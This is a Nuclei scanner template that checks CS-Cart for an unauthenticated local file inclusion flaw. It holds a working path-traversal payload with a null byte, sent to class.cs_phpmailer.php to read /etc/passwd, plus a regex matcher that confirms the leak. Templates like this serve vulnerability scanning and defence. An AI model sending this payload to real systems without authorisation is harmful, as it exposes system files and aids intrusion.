id: cs-cart-unauthenticated-lfi

info:
  name: CS-Cart - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: CS-Cart is vulnerable to local file inclusion because it allows remote unauthenticated attackers to access locally stored files and reveal their content.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100100
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: cscart,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/22
